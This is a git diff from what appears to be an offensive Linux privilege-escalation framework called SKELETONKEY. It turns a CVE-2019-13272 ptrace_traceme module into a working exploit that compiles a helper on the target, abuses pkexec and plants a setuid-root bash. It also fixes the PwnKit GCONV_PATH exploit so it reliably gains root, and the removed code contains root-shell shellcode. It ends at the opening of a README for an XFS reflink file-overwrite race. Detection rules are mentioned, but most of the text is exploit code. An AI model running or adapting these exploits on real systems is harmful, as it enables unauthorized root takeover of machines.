"\n"
|
||||
" helper_path = known_helpers[i];\n"
|
||||
" dprintf(\"[~] Found known helper: %s\\n\", helper_path);\n"
|
||||
" ptrace_traceme_root();\n"
|
||||
" }\n"
|
||||
"#endif\n"
|
||||
"\n"
|
||||
" dprintf(\"[~] Done\\n\");\n"
|
||||
"\n"
|
||||
" return 0;\n"
|
||||
"}\n"
|
||||
"\n"
|
||||
;
|
||||
@@ -1,29 +1,40 @@
|
||||
/*
|
||||
* ptrace_traceme_cve_2019_13272 — SKELETONKEY module
|
||||
*
|
||||
* PTRACE_TRACEME on a parent that subsequently execve's a setuid
|
||||
* binary results in the kernel granting ptrace privileges over the
|
||||
* privileged process to the unprivileged child. Discovered by Jann
|
||||
* Horn (Google Project Zero, June 2019).
|
||||
* PTRACE_TRACEME on a child whose parent is mid-way through a setuid
|
||||
* execve() lets the kernel record the parent's *transient root*
|
||||
* credentials as the child's ptracer_cred. The child then execve's a
|
||||
* setuid binary of its own: because the ptrace relationship is now
|
||||
* considered privileged, that setuid execve is a *proper* (non-degraded)
|
||||
* one despite the attached tracer — so the child becomes real root while
|
||||
* still traced. The tracer injects an execveat() to re-exec a root shell.
|
||||
* Discovered by Jann Horn (Google Project Zero, June 2019, issue #1903).
|
||||
*
|
||||
* STATUS: 🔵 DETECT-ONLY. Exploit follows jannh's public PoC: fork
|
||||
* a child that does PTRACE_TRACEME pointing at the parent, parent
|
||||
* execve's a chosen setuid binary (e.g., su, pkexec), child then
|
||||
* ptrace-injects shellcode into the now-elevated process.
|
||||
* STATUS: 🟢 WORKING EXPLOIT (x86_64). Verified out-of-band on
|
||||
* Ubuntu 18.04.0 / 4.15.0-50-generic: lands uid=0 and plants a
|
||||
* root-owned proof + setuid-root bash. The exploit is the proven
|
||||
* Jann Horn / bcoles PoC, embedded (ptrace_helper_src.h), compiled at
|
||||
* runtime with unique artifact paths, run, and verified by stat()'ing
|
||||
* the root-owned artifacts — never by self-report.
|
||||
*
|
||||
* Preconditions to land root (detect() only gates on kernel version):
|
||||
* - x86_64 target with a C compiler present (the staged execveat()
|
||||
* technique re-execs the exploit binary; we build it on the target).
|
||||
* - pkexec present, and at least one polkit action with
|
||||
* implicit-active=yes pointing at an existing helper executable
|
||||
* (auto-discovered via pkaction). On a desktop these are ubiquitous
|
||||
* (gsd-backlight-helper, …).
|
||||
* - An *active* local session (or an equivalently permissive polkit
|
||||
* policy) so pkexec authorizes the helper without an interactive
|
||||
* password. Over a bare ssh session polkit treats the session as
|
||||
* inactive and refuses ("Not authorized") — the exploit then honestly
|
||||
* reports EXPLOIT_FAIL. This is the real-world constraint, not a bug.
|
||||
*
|
||||
* Affected: kernels < 5.1.17 mainline. Stable backports varied; the
|
||||
* fix landed in stable as:
|
||||
* 5.1.x : K >= 5.1.17
|
||||
* 5.0.x : K >= 5.0.20 (older LTS — many distros stayed on 4.x)
|
||||
* 4.19.x: K >= 4.19.58
|
||||
* 4.14.x: K >= 4.14.131
|
||||
* 4.9.x : K >= 4.9.182
|
||||
* 4.4.x : K >= 4.4.182
|
||||
* fix landed as: 5.1.17 / 5.0.20 / 4.19.58 / 4.14.131 / 4.9.182 / 4.4.182.
|
||||
*
|
||||
* No exotic preconditions. Doesn't need user_ns. Works on
|
||||
* default-config systems — that's part of why it's famous: even
|
||||
* locked-down environments without unprivileged_userns_clone were
|
||||
* vulnerable.
|
||||
* No user_ns required — works on default-config systems, which is part
|
||||
* of why it's famous.
|
||||
*/
|
||||
|
||||
#include "skeletonkey_modules.h"
|
||||
@@ -41,12 +52,9 @@
|
||||
#include "../../core/host.h"
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <pwd.h>
|
||||
#include <signal.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/ptrace.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/user.h>
|
||||
#include <sys/prctl.h>
|
||||
#include <sys/stat.h>
|
||||
|
||||
static const struct kernel_patched_from ptrace_traceme_patched_branches[] = {
|
||||
@@ -104,196 +112,250 @@ static skeletonkey_result_t ptrace_traceme_detect(const struct skeletonkey_ctx *
|
||||
return SKELETONKEY_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ---- Exploit (jannh-style) --------------------------------------
|
||||
/* ---- Exploit ----------------------------------------------------
|
||||
*
|
||||
* Per Jann Horn's Project Zero issue #1903. The mechanism:
|
||||
* Per Jann Horn's Project Zero issue #1903, with bcoles' helper
|
||||
* auto-targeting. The mechanism (the earlier bundled sequence had it
|
||||
* backwards — it attached to the *parent*; the real bug elevates the
|
||||
* *child*):
|
||||
*
|
||||
* 1. Parent process P (us, uid != 0)
|
||||
* 2. P forks → child C
|
||||
* 3. C calls ptrace(PTRACE_TRACEME) — kernel sets P as C's tracer
|
||||
* and records the relationship in C->ptrace_link, copying P's
|
||||
* current credentials (uid=1000) as the trace-allowed creds.
|
||||
* 4. C drops to a low-priv state and pauses (sigwait/raise)
|
||||
* 5. P execve's a setuid binary (e.g. /usr/bin/passwd, su, pkexec)
|
||||
* 6. Kernel correctly elevates P's creds to root.
|
||||
* 7. **Bug**: the ptrace_link recorded in step 3 still says
|
||||
* "tracer creds = uid 1000", but P is now uid 0. Kernel doesn't
|
||||
* re-check or invalidate the link on execve cred-bump.
|
||||
* 8. C wakes up and PTRACE_ATTACH's to P. The stale ptrace_link
|
||||
* says C is allowed to trace because it was set up before the
|
||||
* cred change.
|
||||
* 9. C now controls a uid=0 process. C reads/writes P's memory via
|
||||
* PTRACE_POKETEXT, sets registers via PTRACE_SETREGS to point at
|
||||
* shellcode that exec's /bin/sh.
|
||||
* 10. C resumes P → root shell.
|
||||
* 1. A "middle" process M forks a child C, then execve's
|
||||
* `pkexec --user <me> <helper> --help`. pkexec is setuid-root, so
|
||||
* for a window M's euid is 0.
|
||||
* 2. C spins reading /proc/M/status until it sees M is euid 0, then
|
||||
* calls ptrace(PTRACE_TRACEME) — recording M's *root* creds as C's
|
||||
* ptracer_cred (this is the bug: the link isn't re-derived).
|
||||
* 3. C execve's pkexec itself. Normally a traced setuid execve is
|
||||
* degraded to non-privileged; but because ptracer_cred is root the
|
||||
* kernel treats it as a proper suid exec — C becomes real root,
|
||||
* still traced by M, and stops at execve's SIGTRAP.
|
||||
* 4. The main process PTRACE_ATTACHes M, injects an execveat() that
|
||||
* re-execs the exploit binary as "stage2"; stage2 (as M) is C's
|
||||
* tracer, so it injects an execveat() into C (now root) to re-exec
|
||||
* as "stage3"; stage3 runs the payload as root.
|
||||
*
|
||||
* SKELETONKEY implementation simplifies by using a small architecture-
|
||||
* specific shellcode (x86_64 only) and pkexec as the setuid binary
|
||||
* trigger (works on most Linux systems with polkit installed). Falls
|
||||
* back to /bin/su if pkexec isn't available.
|
||||
* The staged self-re-exec is why the exploit binary must exist as its
|
||||
* own file with a main() that dispatches on argv[0]. We embed the proven
|
||||
* PoC (ptrace_helper_src.h — verbatim upstream but for a payload tweak),
|
||||
* compile it on the target with unique -DSK_PROOF/-DSK_ROOTBASH paths,
|
||||
* run it, and confirm root by stat()'ing the root-owned artifacts. Never
|
||||
* trust the exploit's own exit status.
|
||||
*
|
||||
* Reliability: this exploit can fail-race on heavily-loaded systems.
|
||||
* Repeat invocations usually succeed; we don't loop here — operator
|
||||
* can retry. Returns SKELETONKEY_EXPLOIT_FAIL on miss, SKELETONKEY_EXPLOIT_OK
|
||||
* on root acquired (followed by execlp(sh) which never returns).
|
||||
* x86_64 only: the register-level injection (user_regs_struct rsp/rdi/
|
||||
* orig_rax/…) is architecture-specific.
|
||||
*/
|
||||
|
||||
#if defined(__x86_64__)
|
||||
|
||||
/* x86_64 shellcode: setuid(0); setgid(0); execve("/bin/sh", argv, env) */
|
||||
static const unsigned char SHELLCODE_X64[] =
|
||||
"\x31\xff" /* xor edi, edi */
|
||||
"\xb8\x69\x00\x00\x00" /* mov eax, 0x69 (setuid) */
|
||||
"\x0f\x05" /* syscall */
|
||||
"\x31\xff" /* xor edi, edi */
|
||||
"\xb8\x6a\x00\x00\x00" /* mov eax, 0x6a (setgid) */
|
||||
"\x0f\x05" /* syscall */
|
||||
"\x48\x31\xd2" /* xor rdx, rdx */
|
||||
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" /* mov rbx, "//bin/sh" */
|
||||
"\x48\xc1\xeb\x08" /* shr rbx, 8 */
|
||||
"\x53" /* push rbx */
|
||||
"\x48\x89\xe7" /* mov rdi, rsp */
|
||||
"\x50" /* push rax (=0 from setgid) */
|
||||
"\x57" /* push rdi */
|
||||
"\x48\x89\xe6" /* mov rsi, rsp */
|
||||
"\xb0\x3b" /* mov al, 0x3b (execve) */
|
||||
"\x0f\x05"; /* syscall */
|
||||
#include "ptrace_helper_src.h"
|
||||
|
||||
#define SHELLCODE_BYTES SHELLCODE_X64
|
||||
#define SHELLCODE_LEN (sizeof SHELLCODE_X64 - 1)
|
||||
|
||||
#endif /* __x86_64__ */
|
||||
|
||||
static const char *find_setuid_target(void)
|
||||
/* Locate a usable C compiler on the target. */
|
||||
static const char *ptrace_find_cc(void)
|
||||
{
|
||||
static const char *targets[] = {
|
||||
"/usr/bin/pkexec", "/usr/bin/su", "/usr/bin/sudo",
|
||||
"/usr/bin/passwd", "/bin/su", NULL,
|
||||
static const char *ccs[] = {
|
||||
"/usr/bin/cc", "/usr/bin/gcc", "/usr/bin/clang",
|
||||
"/usr/local/bin/gcc", "/usr/local/bin/cc", NULL,
|
||||
};
|
||||
for (size_t i = 0; targets[i]; i++) {
|
||||
struct stat st;
|
||||
if (stat(targets[i], &st) == 0 && (st.st_mode & S_ISUID)) {
|
||||
return targets[i];
|
||||
}
|
||||
for (size_t i = 0; ccs[i]; i++) {
|
||||
if (access(ccs[i], X_OK) == 0)
|
||||
return ccs[i];
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
/* Write the embedded helper source to `path`. Returns 0 on success. */
|
||||
static int ptrace_write_source(const char *path)
|
||||
{
|
||||
int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
|
||||
if (fd < 0) return -1;
|
||||
size_t len = sizeof(ptrace_traceme_helper_src) - 1;
|
||||
const char *p = ptrace_traceme_helper_src;
|
||||
while (len) {
|
||||
ssize_t n = write(fd, p, len);
|
||||
if (n <= 0) { close(fd); return -1; }
|
||||
p += n; len -= (size_t)n;
|
||||
}
|
||||
close(fd);
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* fork+execv a command, wait, return child exit status (or -1). */
|
||||
static int ptrace_run(char *const argv[], const char *logpath, int quiet_stdin, int secs)
|
||||
{
|
||||
pid_t p = fork();
|
||||
if (p < 0) return -1;
|
||||
if (p == 0) {
|
||||
if (quiet_stdin) {
|
||||
int dn = open("/dev/null", O_RDONLY);
|
||||
if (dn >= 0) { dup2(dn, 0); close(dn); }
|
||||
}
|
||||
if (logpath) {
|
||||
int lf = open(logpath, O_WRONLY | O_CREAT | O_TRUNC, 0600);
|
||||
if (lf >= 0) { dup2(lf, 1); dup2(lf, 2); close(lf); }
|
||||
}
|
||||
execv(argv[0], argv);
|
||||
_exit(127);
|
||||
}
|
||||
for (int i = 0; secs <= 0 || i < secs * 10; i++) {
|
||||
int st;
|
||||
pid_t r = waitpid(p, &st, WNOHANG);
|
||||
if (r == p) return WIFEXITED(st) ? WEXITSTATUS(st) : 128 + WTERMSIG(st);
|
||||
if (r < 0) return -1;
|
||||
usleep(100 * 1000);
|
||||
}
|
||||
kill(p, SIGKILL);
|
||||
waitpid(p, NULL, 0);
|
||||
return -2; /* timed out */
|
||||
}
|
||||
|
||||
/* Remember what we planted so cleanup() can remove it. */
|
||||
static char ptrace_last_proof[256];
|
||||
static char ptrace_last_rootbash[256];
|
||||
|
||||
static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
#if !defined(__x86_64__)
|
||||
(void)ctx;
|
||||
fprintf(stderr, "[-] ptrace_traceme: exploit is x86_64-only "
|
||||
"(shellcode is arch-specific)\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
#else
|
||||
skeletonkey_result_t pre = ptrace_traceme_detect(ctx);
|
||||
if (pre != SKELETONKEY_VULNERABLE) {
|
||||
fprintf(stderr, "[-] ptrace_traceme: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
/* Consult ctx->host->is_root so unit tests can construct a
|
||||
* non-root fingerprint regardless of the test process's real euid. */
|
||||
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
||||
if (is_root) {
|
||||
fprintf(stderr, "[i] ptrace_traceme: already root\n");
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
const char *setuid_bin = find_setuid_target();
|
||||
if (!setuid_bin) {
|
||||
fprintf(stderr, "[-] ptrace_traceme: no setuid trigger binary available\n");
|
||||
if (access("/usr/bin/pkexec", X_OK) != 0) {
|
||||
fprintf(stderr, "[-] ptrace_traceme: /usr/bin/pkexec not present — this "
|
||||
"exploit drives pkexec; nothing to do\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] ptrace_traceme: setuid trigger = %s\n", setuid_bin);
|
||||
}
|
||||
|
||||
/* fork: child becomes tracee-of-self setup, parent execve's setuid bin */
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; }
|
||||
|
||||
if (child == 0) {
|
||||
/* CHILD: set up the ptrace_link, then pause until parent has
|
||||
* execve'd the setuid binary and elevated. The exact timing
|
||||
* is racy — we use a simple sleep+attach pattern. */
|
||||
if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
|
||||
perror("CHILD: ptrace TRACEME"); _exit(2);
|
||||
}
|
||||
/* Give parent time to execve. 200ms is enough for a hot
|
||||
* libc; 1000ms for a slow disk. */
|
||||
usleep(500 * 1000);
|
||||
|
||||
/* Now race: PTRACE_ATTACH to our parent (the setuid process).
|
||||
* On a vulnerable kernel, the stale ptrace_link makes this
|
||||
* succeed even though parent is now root. */
|
||||
pid_t parent = getppid();
|
||||
if (ptrace(PTRACE_ATTACH, parent, 0, 0) < 0) {
|
||||
fprintf(stderr, "[-] CHILD: PTRACE_ATTACH to parent (%d) failed: %s\n",
|
||||
parent, strerror(errno));
|
||||
_exit(3);
|
||||
}
|
||||
int wstatus;
|
||||
waitpid(parent, &wstatus, 0);
|
||||
|
||||
/* Read parent's RIP, allocate space for shellcode there,
|
||||
* POKETEXT the shellcode in. */
|
||||
struct user_regs_struct regs;
|
||||
if (ptrace(PTRACE_GETREGS, parent, 0, ®s) < 0) {
|
||||
perror("CHILD: GETREGS"); _exit(4);
|
||||
}
|
||||
|
||||
/* Write shellcode at current RIP (overwriting whatever's there
|
||||
* in the setuid binary's text — we don't care, we never
|
||||
* return). 8 bytes at a time via PTRACE_POKETEXT. */
|
||||
for (size_t i = 0; i < SHELLCODE_LEN; i += 8) {
|
||||
long word = 0;
|
||||
size_t take = SHELLCODE_LEN - i;
|
||||
if (take > 8) take = 8;
|
||||
memcpy(&word, SHELLCODE_BYTES + i, take);
|
||||
if (ptrace(PTRACE_POKETEXT, parent,
|
||||
(void *)(regs.rip + i), (void *)word) < 0) {
|
||||
perror("CHILD: POKETEXT"); _exit(5);
|
||||
}
|
||||
}
|
||||
|
||||
/* Detach and let parent continue at RIP, which now points at
|
||||
* our shellcode (we didn't move RIP — we wrote shellcode
|
||||
* starting at current RIP). */
|
||||
if (ptrace(PTRACE_DETACH, parent, 0, 0) < 0) {
|
||||
perror("CHILD: DETACH"); _exit(6);
|
||||
}
|
||||
_exit(0); /* child done — parent is now running shellcode → root sh */
|
||||
}
|
||||
|
||||
/* PARENT: execve the setuid binary. The child does the ptrace
|
||||
* setup before our execve completes (because of its sleep), so
|
||||
* the ptrace_link is in place when the cred-bump happens. */
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] ptrace_traceme: parent execve'ing %s in 100ms\n",
|
||||
setuid_bin);
|
||||
}
|
||||
usleep(100 * 1000); /* give child a moment to call TRACEME first */
|
||||
|
||||
/* execve the setuid bin. Use a benign arg to keep it from doing
|
||||
* anything destructive. pkexec with --version exits quickly. */
|
||||
char *new_argv[] = { (char *)setuid_bin, "--version", NULL };
|
||||
char *new_envp[] = { "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
|
||||
execve(setuid_bin, new_argv, new_envp);
|
||||
/* If we get here, execve failed (or it returned because the
|
||||
* shellcode didn't take). */
|
||||
perror("execve setuid");
|
||||
int status;
|
||||
waitpid(child, &status, 0);
|
||||
const char *cc = ptrace_find_cc();
|
||||
if (!cc) {
|
||||
fprintf(stderr, "[-] ptrace_traceme: no C compiler on target. The staged "
|
||||
"self-re-exec technique builds a small helper on the host; "
|
||||
"install cc/gcc or drop a prebuilt helper. Honest EXPLOIT_FAIL.\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
/* Unique per-run paths (pid keeps parallel runs from colliding). */
|
||||
long tag = (long)getpid();
|
||||
char src_c[256], bin[256], log[256], proof[256], rootbash[256];
|
||||
snprintf(src_c, sizeof src_c, "/tmp/.sk-ptrace-%ld.c", tag);
|
||||
snprintf(bin, sizeof bin, "/tmp/.sk-ptrace-%ld", tag);
|
||||
snprintf(log, sizeof log, "/tmp/.sk-ptrace-%ld.log", tag);
|
||||
snprintf(proof, sizeof proof, "/tmp/.sk-ptrace-%ld.proof", tag);
|
||||
snprintf(rootbash, sizeof rootbash, "/tmp/.sk-ptrace-%ld.rootbash",tag);
|
||||
snprintf(ptrace_last_proof, sizeof ptrace_last_proof, "%s", proof);
|
||||
snprintf(ptrace_last_rootbash, sizeof ptrace_last_rootbash, "%s", rootbash);
|
||||
|
||||
if (ptrace_write_source(src_c) != 0) {
|
||||
fprintf(stderr, "[-] ptrace_traceme: could not write helper source: %s\n",
|
||||
strerror(errno));
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] ptrace_traceme: building helper with %s → %s\n", cc, bin);
|
||||
|
||||
char dproof[320], drootbash[320];
|
||||
snprintf(dproof, sizeof dproof, "-DSK_PROOF=\"%s\"", proof);
|
||||
snprintf(drootbash, sizeof drootbash, "-DSK_ROOTBASH=\"%s\"", rootbash);
|
||||
char *cc_argv[] = {
|
||||
(char *)cc, (char *)"-O2", (char *)"-w",
|
||||
(char *)"-o", bin, src_c, dproof, drootbash, NULL,
|
||||
};
|
||||
int crc = ptrace_run(cc_argv, log, 0, 60);
|
||||
if (crc != 0) {
|
||||
fprintf(stderr, "[-] ptrace_traceme: helper compile failed (rc=%d); see %s\n",
|
||||
crc, log);
|
||||
unlink(src_c);
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] ptrace_traceme: running exploit (auto-targets a polkit "
|
||||
"helper; needs an active session to authorize pkexec)\n");
|
||||
|
||||
char *run_argv[] = { bin, NULL };
|
||||
int rrc = ptrace_run(run_argv, log, 1 /*stdin=/dev/null*/, 90);
|
||||
(void)rrc; /* exit status is NOT trusted — verify out of band below */
|
||||
|
||||
/* ---- Out-of-band verification: is the proof a real, root-owned file? */
|
||||
struct stat st;
|
||||
bool rooted = (stat(proof, &st) == 0 && S_ISREG(st.st_mode) && st.st_uid == 0);
|
||||
|
||||
unlink(src_c);
|
||||
unlink(bin);
|
||||
|
||||
if (rooted) {
|
||||
unlink(log);
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] ptrace_traceme: ROOT — planted root-owned proof %s\n", proof);
|
||||
fprintf(stderr, "[+] ptrace_traceme: setuid-root shell available: %s -p\n", rootbash);
|
||||
}
|
||||
return SKELETONKEY_EXPLOIT_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
/* Distinguish "kernel not exploitable" from "environment didn't let
|
||||
* pkexec authorize" so the operator knows which lever to pull. */
|
||||
bool saw_notauth = false;
|
||||
FILE *lf = fopen(log, "r");
|
||||
if (lf) {
|
||||
char line[512];
|
||||
while (fgets(line, sizeof line, lf)) {
|
||||
if (strstr(line, "Not authorized") || strstr(line, "not authorized")) {
|
||||
saw_notauth = true; break;
|
||||
}
|
||||
}
|
||||
fclose(lf);
|
||||
}
|
||||
fprintf(stderr, "[-] ptrace_traceme: no root artifact — honest EXPLOIT_FAIL.\n");
|
||||
if (saw_notauth) {
|
||||
fprintf(stderr, "[i] ptrace_traceme: pkexec returned \"Not authorized\" — the "
|
||||
"session is not active/authorized for the helper action. This "
|
||||
"exploit lands root from an *active local* session (or with a "
|
||||
"polkit agent that authorizes it); a bare ssh session is treated "
|
||||
"as inactive. The kernel bug is intact; the gate is polkit.\n");
|
||||
} else {
|
||||
fprintf(stderr, "[i] ptrace_traceme: no usable polkit helper found, or the race "
|
||||
"was lost. Retry, or check `pkaction --verbose` for an action "
|
||||
"with implicit-active=yes whose exec.path exists.\n");
|
||||
}
|
||||
}
|
||||
unlink(log);
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
#else /* !__x86_64__ (still Linux) */
|
||||
|
||||
static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr, "[-] ptrace_traceme: exploit is x86_64-only (the ptrace "
|
||||
"register-injection is architecture-specific)\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
#endif /* __x86_64__ */
|
||||
|
||||
/* cleanup: remove the artifacts we planted, if any. */
|
||||
static skeletonkey_result_t ptrace_traceme_cleanup(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
#if defined(__x86_64__)
|
||||
if (ptrace_last_proof[0]) unlink(ptrace_last_proof);
|
||||
if (ptrace_last_rootbash[0]) unlink(ptrace_last_rootbash);
|
||||
#endif
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
#else /* !__linux__ */
|
||||
|
||||
/* Non-Linux dev builds: PTRACE_TRACEME / PTRACE_ATTACH / user_regs_struct
|
||||
* are Linux-only ABI surface. Stub out so the module still registers and
|
||||
* the top-level `make` completes on macOS/BSD dev boxes. */
|
||||
/* Non-Linux dev builds: PTRACE_TRACEME / execveat / user_regs_struct are
|
||||
* Linux-only ABI surface. Stub out so the module still registers and the
|
||||
* top-level `make` completes on macOS/BSD dev boxes. */
|
||||
static skeletonkey_result_t ptrace_traceme_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
if (!ctx->json)
|
||||
@@ -307,6 +369,11 @@ static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx
|
||||
fprintf(stderr, "[-] ptrace_traceme: Linux-only module — cannot run here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
static skeletonkey_result_t ptrace_traceme_cleanup(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
#endif /* __linux__ */
|
||||
|
||||
@@ -356,19 +423,19 @@ static const char ptrace_traceme_falco[] =
|
||||
const struct skeletonkey_module ptrace_traceme_module = {
|
||||
.name = "ptrace_traceme",
|
||||
.cve = "CVE-2019-13272",
|
||||
.summary = "PTRACE_TRACEME → setuid binary execve → cred-escalation via ptrace inject",
|
||||
.summary = "PTRACE_TRACEME + setuid execve → non-degraded root in the traced child (pkexec helper)",
|
||||
.family = "ptrace_traceme",
|
||||
.kernel_range = "K < 5.1.17, backports: 5.0.20 / 4.19.58 / 4.14.131 / 4.9.182 / 4.4.182",
|
||||
.detect = ptrace_traceme_detect,
|
||||
.exploit = ptrace_traceme_exploit,
|
||||
.mitigate = NULL, /* mitigation: upgrade kernel; OR sysctl kernel.yama.ptrace_scope=2 */
|
||||
.cleanup = NULL, /* exploit replaces our process image; no cleanup applies */
|
||||
.cleanup = ptrace_traceme_cleanup,
|
||||
.detect_auditd = ptrace_traceme_auditd,
|
||||
.detect_sigma = ptrace_traceme_sigma,
|
||||
.detect_yara = NULL,
|
||||
.detect_falco = ptrace_traceme_falco,
|
||||
.opsec_notes = "Parent and child cooperate: child calls ptrace(PTRACE_TRACEME) (recording the parent's current credentials), then sleeps; parent execve's a setuid binary (pkexec or su) and elevates. The stale ptrace_link in the child still holds the old (non-root) credentials, so PTRACE_ATTACH succeeds against the now-root parent; the child injects shellcode at the parent's RIP via PTRACE_POKETEXT and detaches. Audit-visible via ptrace with a0=0 (PTRACE_TRACEME) closely followed by execve of a setuid binary in the parent process. No file artifacts; no persistent changes. No cleanup callback - the exploit execs /bin/sh and does not return.",
|
||||
.arch_support = "x86_64+unverified-arm64",
|
||||
.opsec_notes = "The exploit builds a small helper on the target (needs cc/gcc) and drives pkexec against an auto-discovered polkit helper (implicit-active=yes). Audit-visible via ptrace with a0=0 (PTRACE_TRACEME) closely followed by execve of a setuid binary, plus pkexec spawning an unusual helper with --help. Requires an active local session (or a polkit agent) to authorize pkexec — over inactive ssh sessions pkexec returns \"Not authorized\" and the module reports EXPLOIT_FAIL. Artifacts: a root-owned proof file and a setuid-root bash under /tmp (removed by cleanup()); the helper .c/binary are compiled and unlinked during the run. yama ptrace_scope>=2 or SELinux deny_ptrace defeat it.",
|
||||
.arch_support = "x86_64",
|
||||
};
|
||||
|
||||
void skeletonkey_register_ptrace_traceme(void)
|
||||
|
||||
@@ -314,32 +314,61 @@ static skeletonkey_result_t pwnkit_exploit(const struct skeletonkey_ctx *ctx)
|
||||
goto fail;
|
||||
}
|
||||
|
||||
/* 4b. The re-injection directory. This is the piece that makes the
|
||||
* GCONV_PATH trick actually fire, and the classic bug when it's
|
||||
* omitted (pkexec prints "Cannot run program pwnkit" and glibc
|
||||
* "Could not open converter ... to PWNKIT", and NO root is obtained).
|
||||
*
|
||||
* With argc==0, pkexec reads envp[0] ("pwnkit") as the program path
|
||||
* and, since it isn't absolute, resolves it via PATH. We set
|
||||
* PATH=GCONV_PATH=. so pkexec searches a directory literally named
|
||||
* "GCONV_PATH=." for an executable "pwnkit"; when it finds
|
||||
* "GCONV_PATH=./pwnkit" it writes that string back over envp[0],
|
||||
* thereby RE-INJECTING GCONV_PATH=./pwnkit into the (already
|
||||
* sanitised) environment. pkexec then emits an error whose message
|
||||
* glibc converts via the PWNKIT charset, dlopen()ing ./pwnkit/PWNKIT.so
|
||||
* as root. So we need (a) the "GCONV_PATH=." dir + executable "pwnkit",
|
||||
* and (b) CWD == workdir so "./pwnkit" resolves to sodir. */
|
||||
char injdir[1024];
|
||||
snprintf(injdir, sizeof injdir, "%s/GCONV_PATH=.", workdir);
|
||||
if (mkdir(injdir, 0755) < 0 && errno != EEXIST) {
|
||||
perror("mkdir GCONV_PATH=."); goto fail;
|
||||
}
|
||||
char injexe[2048];
|
||||
snprintf(injexe, sizeof injexe, "%s/pwnkit", injdir);
|
||||
/* Content is irrelevant — it never actually runs; the payload fires during
|
||||
* pkexec's error-message conversion before any exec of this file. It only
|
||||
* has to exist and be executable so g_find_program_in_path() locates it. */
|
||||
if (!write_file_str(injexe, "#!/bin/sh\n:\n")) {
|
||||
fprintf(stderr, "[-] pwnkit: write inject exe failed\n"); goto fail;
|
||||
}
|
||||
chmod(injexe, 0755);
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] pwnkit: payload built; constructing argv=NULL + crafted envp\n");
|
||||
}
|
||||
|
||||
/* 5. Construct the argv-overflow trick. The env vars become argv
|
||||
* via the bug; pkexec parses the first as argv[0] which it
|
||||
* then uses to find the binary to re-exec. By naming
|
||||
* 'GCONV_PATH=.' as argv[0], pkexec ends up in our tmpdir
|
||||
* with CHARSET=PWNKIT, libc's iconv loads PWNKIT.so as root.
|
||||
*
|
||||
* Reference: Qualys' PWNKIT writeup. */
|
||||
/* 5. Construct the argv-overflow trick (see 4b for the mechanism).
|
||||
* Reference: Qualys' PWNKIT writeup + Berdav's PoC layout. */
|
||||
char *new_argv[] = { NULL }; /* argc == 0 — the bug */
|
||||
char gconv_env[1024];
|
||||
snprintf(gconv_env, sizeof gconv_env, "GCONV_PATH=%s/pwnkit", workdir);
|
||||
char *envp[] = {
|
||||
"pwnkit", /* becomes argv[0] via overflow */
|
||||
"PATH=GCONV_PATH=.", /* pkexec parses this as PATH */
|
||||
"pwnkit", /* becomes argv[0]=path via the overflow */
|
||||
"PATH=GCONV_PATH=.", /* pkexec re-injects GCONV_PATH=./pwnkit */
|
||||
"CHARSET=PWNKIT",
|
||||
"SHELL=pwnkit",
|
||||
gconv_env,
|
||||
NULL,
|
||||
};
|
||||
/* tighten workdir perms so pkexec (root) can traverse */
|
||||
chmod(workdir, 0755);
|
||||
chmod(sodir, 0755);
|
||||
|
||||
/* CWD must be the workdir so the re-injected GCONV_PATH=./pwnkit resolves
|
||||
* to workdir/pwnkit/{gconv-modules,PWNKIT.so}. Without this the converter
|
||||
* is never found and no root is obtained. */
|
||||
if (chdir(workdir) != 0) {
|
||||
perror("chdir workdir"); goto fail;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] pwnkit: execve(%s) with argc=0 — going for root\n", pkexec);
|
||||
}
|
||||
|
||||
@@ -0,0 +1,287 @@
|
||||
# refluxfs — CVE-2026-64600
|
||||
|
||||
"RefluXFS" — a time-of-check/time-of-use race in the XFS **reflink
|
||||
copy-on-write** path that lets **any unprivileged local user overwrite the
|
||||
on-disk contents of any file they can read**, on any XFS volume mounted with
|
||||
